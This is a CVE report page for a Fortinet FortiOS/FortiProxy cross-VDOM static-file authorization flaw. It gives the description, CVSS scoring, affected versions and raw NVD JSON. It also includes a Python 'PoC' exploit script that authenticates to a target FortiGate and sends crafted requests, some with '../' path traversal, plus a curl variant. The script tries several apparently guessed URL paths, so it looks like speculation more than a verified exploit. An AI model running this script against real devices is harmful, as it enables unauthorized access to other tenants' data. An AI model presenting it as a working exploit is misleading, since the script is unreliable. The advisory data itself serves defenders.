Security Vulnerability Report
CVE-2025-54822 CVSS 4.3 MEDIUM

CVE-2025-54822

Published: 2025-10-14 16:15:39
Last Modified: 2026-01-14 10:16:06

Description

An improper authorization vulnerability [CWE-285] in Fortinet FortiOS 7.4.0 through 7.4.1, FortiOS 7.2.0 through 7.2.8, FortiOS 7.0.0 through 7.0.11, FortiProxy 7.4.0 through 7.4.8, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, and FortiProxy 2.0 all versions allows an authenticated attacker to access static files of other VDOMs via crafted HTTP or HTTPS requests.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* (7.0.0 up to, but excluding, 7.2.9) - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* (7.4.0 up to, but excluding, 7.4.2) - VULNERABLE
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* (2.0.0 up to, but excluding, 7.4.9) - VULNERABLE
FortiOS 7.4.0 - 7.4.1
FortiOS 7.2.0 - 7.2.8
FortiOS 7.0.0 - 7.0.11
FortiProxy 7.4.0 - 7.4.8
FortiProxy 7.2 all versions
FortiProxy 7.0 all versions
FortiProxy 2.0 all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54822 - Fortinet FortiOS/FortiProxy VDOM Static File Access PoC
# Vulnerability: Improper Authorization (CWE-285) - Cross-VDOM static file access
# Author: Security Researcher
# Note: Requires valid low-privilege authenticated session

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_HOST = "https://<target-fortigate-ip>"
USERNAME = "low_privilege_user"
PASSWORD = "password123"
TARGET_VDOM = "root"  # Target VDOM to access (e.g., "root", "vdom1", etc.)

session = requests.Session()
session.verify = False

# Step 1: Authenticate to the FortiGate device
login_url = f"{TARGET_HOST}/logincheck"
login_data = {
    "username": USERNAME,
    "secretkey": PASSWORD,
}
response = session.post(login_url, data=login_data)

if response.status_code == 200 and "FORTINET" not in response.text:
    print("[+] Authentication successful")
else:
    print("[-] Authentication failed")
    exit(1)

# Step 2: Exploit VDOM static file access via crafted HTTP request
# The vulnerability allows accessing static files of other VDOMs
# by manipulating the request path or VDOM context

# Method 1: Direct path manipulation to target VDOM static files
exploit_urls = [
    f"{TARGET_HOST}/static/{TARGET_VDOM}/css/style.css",
    f"{TARGET_HOST}/static/{TARGET_VDOM}/js/main.js",
    f"{TARGET_HOST}/favicon.ico?vdom={TARGET_VDOM}",
    f"{TARGET_HOST}/{TARGET_VDOM}/static/../static/config.txt",
    f"{TARGET_HOST}/ng/fortiview/../static/{TARGET_VDOM}/index.html",
]

for url in exploit_urls:
    try:
        resp = session.get(url, timeout=10)
        if resp.status_code == 200 and len(resp.content) > 0:
            print(f"[+] Successfully accessed: {url}")
            print(f"    Content-Length: {len(resp.content)}")
            print(f"    Preview: {resp.text[:200]}")
        else:
            print(f"[-] Access denied or empty: {url} (Status: {resp.status_code})")
    except Exception as e:
        print(f"[-] Error accessing {url}: {e}")

# Method 2: Using curl equivalent
# curl -k -b "APISESSIONID=<session_cookie>" \
#      "https://<target>/static/<target_vdom>/path/to/static/file"

print("\n[*] PoC execution completed")

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-684 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-54822",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-14T16:15:39.180",
    "lastModified": "2026-01-14T10:16:05.973",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An improper authorization vulnerability [CWE-285] vulnerability in Fortinet FortiOS 7.4.0 through 7.4.1, FortiOS 7.2.0 through 7.2.8, FortiOS 7.0.0 through 7.0.11, FortiProxy 7.4.0 through 7.4.8, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiProxy 2.0 all versions allows an authenticated attacker to access static files of others VDOMs via crafted HTTP or HTTPS requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-285"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.0.0",
                "versionEndExcluding": "7.2.9",
                "matchCriteriaId": "AC7395B0-2864-49E3-8B70-935A17EF3162"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.4.0",
                "versionEndExcluding": "7.4.2",
                "matchCriteriaId": "4316C2EA-3D6E-4A0C-B81D-ADCE040E03E0"
              }
            ]
          }
        ]
      },
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.0.0",
                "versionEndExcluding": "7.4.9",
                "matchCriteriaId": "BB3C0418-E314-45E0-A706-A9B45231ED1E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-684",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}